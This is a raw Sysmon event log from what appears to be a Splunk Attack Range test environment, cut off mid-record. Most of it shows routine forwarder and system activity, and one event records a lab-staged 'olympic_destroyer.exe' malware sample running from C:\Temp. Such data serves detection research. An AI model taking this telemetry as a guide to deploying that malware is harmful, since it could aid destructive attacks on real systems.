11:12:50.265{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-156MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296751Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:50.047{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B25CD7CF8E5D31D44E1775CCC892972,SHA256=7D8D917773BFA3825786F1C47F3BCED1A8064995FAB91BFE42FCBB2EB2CD207F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296750Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:47.524{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49379-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000220750Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:48.571{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51601-false10.0.1.12-8000- 10341000x8000000000000000220749Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:51.230{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-16B3-6216-F904-000000003902}1956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220748Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:51.230{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220747Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:51.230{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220746Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:51.230{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220745Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:51.230{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220744Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:51.230{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220743Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:51.230{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220742Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:51.230{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220741Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:51.230{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220740Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:51.230{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220739Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:51.230{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-16B3-6216-F904-000000003902}1956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220738Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:51.230{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-16B3-6216-F904-000000003902}1956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220737Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:51.230{4F8D34B0-16B3-6216-F904-000000003902}1956C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220736Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:51.151{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC97FDF504F993BF7E80BA0E1581C415,SHA256=A327542B22A1C074139D3DCC7BC6EED1596D296DB1C2EA3C3D2A34EBCB47F0D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296753Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:51.068{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A29D57FD9E5F5BC88E11ACD0BAE7187D,SHA256=0643DF2746363BA76FC7F204935F9B980A32F3D15692E8C8412F5F497924ABB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220752Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:52.386{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05F7AC9A4C03983DC44A9C05AF53E683,SHA256=9B447A6D4B9D2855CAF7EFE386A9FD417DB393FC5960ECFA11A7486D9B60CBB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296755Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:52.663{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=37399AAE7CAF44ADF442AA0ACFBEA0AA,SHA256=69EE48016955E2D0A974126760F757B9E184FA76DD17700E5502E638B65FF8CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296754Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:52.098{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6EFC435C195E008EE1768A00D0054BD,SHA256=830C6922AADBD1CE84B8E53445286D5FAF4E98CFD13C835B5F8C5241E99F9679,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220751Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:52.292{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D926D0DFB193FF524ED77E965D02A24F,SHA256=C586D238CDC6C22B7ECE1209B7DEBA362CB2D214179F25D95F4AB94BFE6EA510,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220753Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:53.573{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C60C822FE654710320C79454D12D933A,SHA256=BBD9A4455EC5F4D06743998B278C72BE05690DCC7DB21D21E382052E52CDA9BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296756Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:53.113{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB83A24DC7F7FCF1D60FCD972714853C,SHA256=12707C5CDCEE0F1C7D60525AD60B7269CC72E97A17A3D0FEE3C2725B0D448AFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220754Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:54.604{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A89BBAAA4FA86783FE61849A30CB0933,SHA256=032DC68C60B34441E71827F4655C3D385183555FF9E2462DF33DA1857C272F2B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296758Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:52.671{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49380-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296757Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:54.144{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ED84580A242397B9C58A4BB542B5485,SHA256=915BE46B5F05D258004F279699D6BE627D292F43D8CE92776EB104A28A031EC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220755Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:55.620{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2A9194460D74CFDFCB1A467F76CD827,SHA256=CC38339B3560A462DB030CC50F39987A58A28423C383A91779866415B8FDC7D9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296760Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:53.702{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local137netbios-nsfalse10.0.1.1ip-10-0-1-1.eu-central-1.compute.internal137netbios-ns 23542300x8000000000000000296759Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:55.212{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0604E25E51240069E56718EBF2D875CB,SHA256=226D0D4BB20B96F52565628889F56959C31F244EBD8B0E2D4D04F664CE88C904,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220757Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:56.651{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97D10AFFCB7381E53E8AA0D5E3A35DB6,SHA256=406D25A9FDE5C57BE80741B68F9C21F4B4A4D8E49298AC73631E10C37C7A44D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296761Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:56.228{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE0C18FF2D3D14E6CE3346E0A9EB263E,SHA256=C62296400FB1D14FBFB6E22808FB096077E89B8F7A6A20D2C188E3122B443BDF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220756Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:54.524{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51602-false10.0.1.12-8000- 23542300x8000000000000000220758Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:57.683{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F02BF135B497845CC40F3E62EEE17B6,SHA256=AF27E28B74959572317AA0F91D0C7FE3C374241EF35D94B276C6CA4981DE9153,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296762Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:57.262{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B87F7BE8D2FFC49CC6843C5A28055996,SHA256=9E89701AE91DF70BCA44D54507B383A43B3DD2AAAB7EA129013EFBAB5DD004C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220759Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:12:58.917{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF55A2654A8C841609D807AECB295E96,SHA256=02D8CE6DD8CC6DFA275031AB90385246210056499114ECD2DC7673062280F870,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296765Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:12:58.796{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000296764Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 